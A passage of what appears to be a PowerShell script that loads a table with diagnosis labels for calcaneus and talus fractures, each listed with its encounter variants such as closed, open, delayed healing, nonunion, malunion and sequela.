$DiagnosisList.Rows.Add("Displaced other extraarticular fracture of left calcaneus","Displaced other extraarticular fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of left calcaneus","Displaced other extraarticular fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of left calcaneus","Displaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of left calcaneus","Displaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of left calcaneus","Displaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of left calcaneus","Displaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of left calcaneus","Displaced other extraarticular fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of unspecified calcaneus","Displaced other extraarticular fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of unspecified calcaneus","Displaced other extraarticular fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of unspecified calcaneus","Displaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of unspecified calcaneus","Displaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of unspecified calcaneus","Displaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of unspecified calcaneus","Displaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced other extraarticular fracture of unspecified calcaneus","Displaced other extraarticular fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of right calcaneus","Nondisplaced other extraarticular fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of right calcaneus","Nondisplaced other extraarticular fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of right calcaneus","Nondisplaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of right calcaneus","Nondisplaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of right calcaneus","Nondisplaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of right calcaneus","Nondisplaced other extraarticular fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of right calcaneus","Nondisplaced other extraarticular fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of left calcaneus","Nondisplaced other extraarticular fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of left calcaneus","Nondisplaced other extraarticular fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of left calcaneus","Nondisplaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of left calcaneus","Nondisplaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of left calcaneus","Nondisplaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of left calcaneus","Nondisplaced other extraarticular fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of left calcaneus","Nondisplaced other extraarticular fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of unspecified calcaneus","Nondisplaced other extraarticular fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of unspecified calcaneus","Nondisplaced other extraarticular fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of unspecified calcaneus","Nondisplaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of unspecified calcaneus","Nondisplaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of unspecified calcaneus","Nondisplaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of unspecified calcaneus","Nondisplaced other extraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced other extraarticular fracture of unspecified calcaneus","Nondisplaced other extraarticular fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of right calcaneus","Displaced intraarticular fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of right calcaneus","Displaced intraarticular fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of right calcaneus","Displaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of right calcaneus","Displaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of right calcaneus","Displaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of right calcaneus","Displaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of right calcaneus","Displaced intraarticular fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of left calcaneus","Displaced intraarticular fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of left calcaneus","Displaced intraarticular fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of left calcaneus","Displaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of left calcaneus","Displaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of left calcaneus","Displaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of left calcaneus","Displaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of left calcaneus","Displaced intraarticular fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of unspecified calcaneus","Displaced intraarticular fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of unspecified calcaneus","Displaced intraarticular fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of unspecified calcaneus","Displaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of unspecified calcaneus","Displaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of unspecified calcaneus","Displaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of unspecified calcaneus","Displaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced intraarticular fracture of unspecified calcaneus","Displaced intraarticular fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of right calcaneus","Nondisplaced intraarticular fracture of right calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of right calcaneus","Nondisplaced intraarticular fracture of right calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of right calcaneus","Nondisplaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of right calcaneus","Nondisplaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of right calcaneus","Nondisplaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of right calcaneus","Nondisplaced intraarticular fracture of right calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of right calcaneus","Nondisplaced intraarticular fracture of right calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of left calcaneus","Nondisplaced intraarticular fracture of left calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of left calcaneus","Nondisplaced intraarticular fracture of left calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of left calcaneus","Nondisplaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of left calcaneus","Nondisplaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of left calcaneus","Nondisplaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of left calcaneus","Nondisplaced intraarticular fracture of left calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of left calcaneus","Nondisplaced intraarticular fracture of left calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of unspecified calcaneus","Nondisplaced intraarticular fracture of unspecified calcaneus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of unspecified calcaneus","Nondisplaced intraarticular fracture of unspecified calcaneus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of unspecified calcaneus","Nondisplaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of unspecified calcaneus","Nondisplaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of unspecified calcaneus","Nondisplaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of unspecified calcaneus","Nondisplaced intraarticular fracture of unspecified calcaneus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced intraarticular fracture of unspecified calcaneus","Nondisplaced intraarticular fracture of unspecified calcaneus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right talus","Unspecified fracture of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right talus","Unspecified fracture of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right talus","Unspecified fracture of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right talus","Unspecified fracture of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right talus","Unspecified fracture of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right talus","Unspecified fracture of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right talus","Unspecified fracture of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left talus","Unspecified fracture of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left talus","Unspecified fracture of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left talus","Unspecified fracture of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left talus","Unspecified fracture of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left talus","Unspecified fracture of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left talus","Unspecified fracture of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left talus","Unspecified fracture of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified talus","Unspecified fracture of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified talus","Unspecified fracture of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified talus","Unspecified fracture of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified talus","Unspecified fracture of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified talus","Unspecified fracture of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified talus","Unspecified fracture of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified talus","Unspecified fracture of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right talus","Displaced fracture of neck of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right talus","Displaced fracture of neck of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right talus","Displaced fracture of neck of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right talus","Displaced fracture of neck of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right talus","Displaced fracture of neck of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right talus","Displaced fracture of neck of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of right talus","Displaced fracture of neck of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left talus","Displaced fracture of neck of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left talus","Displaced fracture of neck of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left talus","Displaced fracture of neck of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left talus","Displaced fracture of neck of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left talus","Displaced fracture of neck of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left talus","Displaced fracture of neck of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of left talus","Displaced fracture of neck of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified talus","Displaced fracture of neck of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified talus","Displaced fracture of neck of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified talus","Displaced fracture of neck of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified talus","Displaced fracture of neck of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified talus","Displaced fracture of neck of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified talus","Displaced fracture of neck of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of unspecified talus","Displaced fracture of neck of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right talus","Nondisplaced fracture of neck of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right talus","Nondisplaced fracture of neck of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right talus","Nondisplaced fracture of neck of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right talus","Nondisplaced fracture of neck of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right talus","Nondisplaced fracture of neck of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right talus","Nondisplaced fracture of neck of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of right talus","Nondisplaced fracture of neck of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left talus","Nondisplaced fracture of neck of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left talus","Nondisplaced fracture of neck of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left talus","Nondisplaced fracture of neck of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left talus","Nondisplaced fracture of neck of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left talus","Nondisplaced fracture of neck of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left talus","Nondisplaced fracture of neck of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of left talus","Nondisplaced fracture of neck of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified talus","Nondisplaced fracture of neck of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified talus","Nondisplaced fracture of neck of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified talus","Nondisplaced fracture of neck of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified talus","Nondisplaced fracture of neck of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified talus","Nondisplaced fracture of neck of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified talus","Nondisplaced fracture of neck of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified talus","Nondisplaced fracture of neck of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right talus","Displaced fracture of body of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right talus","Displaced fracture of body of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right talus","Displaced fracture of body of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right talus","Displaced fracture of body of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right talus","Displaced fracture of body of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right talus","Displaced fracture of body of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of right talus","Displaced fracture of body of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left talus","Displaced fracture of body of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left talus","Displaced fracture of body of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left talus","Displaced fracture of body of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left talus","Displaced fracture of body of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left talus","Displaced fracture of body of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left talus","Displaced fracture of body of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of left talus","Displaced fracture of body of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified talus","Displaced fracture of body of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified talus","Displaced fracture of body of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified talus","Displaced fracture of body of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified talus","Displaced fracture of body of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified talus","Displaced fracture of body of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified talus","Displaced fracture of body of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of unspecified talus","Displaced fracture of body of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right talus","Nondisplaced fracture of body of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right talus","Nondisplaced fracture of body of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right talus","Nondisplaced fracture of body of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right talus","Nondisplaced fracture of body of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right talus","Nondisplaced fracture of body of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right talus","Nondisplaced fracture of body of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of right talus","Nondisplaced fracture of body of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left talus","Nondisplaced fracture of body of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left talus","Nondisplaced fracture of body of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left talus","Nondisplaced fracture of body of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left talus","Nondisplaced fracture of body of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left talus","Nondisplaced fracture of body of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left talus","Nondisplaced fracture of body of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of left talus","Nondisplaced fracture of body of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified talus","Nondisplaced fracture of body of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified talus","Nondisplaced fracture of body of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified talus","Nondisplaced fracture of body of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified talus","Nondisplaced fracture of body of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified talus","Nondisplaced fracture of body of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified talus","Nondisplaced fracture of body of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of unspecified talus","Nondisplaced fracture of body of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of right talus","Displaced fracture of posterior process of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of right talus","Displaced fracture of posterior process of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of right talus","Displaced fracture of posterior process of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of right talus","Displaced fracture of posterior process of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of right talus","Displaced fracture of posterior process of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of right talus","Displaced fracture of posterior process of right talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of right talus","Displaced fracture of posterior process of right talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of left talus","Displaced fracture of posterior process of left talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of left talus","Displaced fracture of posterior process of left talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of left talus","Displaced fracture of posterior process of left talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of left talus","Displaced fracture of posterior process of left talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of left talus","Displaced fracture of posterior process of left talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of left talus","Displaced fracture of posterior process of left talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of left talus","Displaced fracture of posterior process of left talus, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of unspecified talus","Displaced fracture of posterior process of unspecified talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of unspecified talus","Displaced fracture of posterior process of unspecified talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of unspecified talus","Displaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of unspecified talus","Displaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of unspecified talus","Displaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of unspecified talus","Displaced fracture of posterior process of unspecified talus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of posterior process of unspecified talus","Displaced fracture of posterior process of unspecified talus, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of right talus","Nondisplaced fracture of posterior process of right talus, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of right talus","Nondisplaced fracture of posterior process of right talus, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of right talus","Nondisplaced fracture of posterior process of right talus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of right talus","Nondisplaced fracture of posterior process of right talus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of right talus","Nondisplaced fracture of posterior process of right talus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of posterior process of right 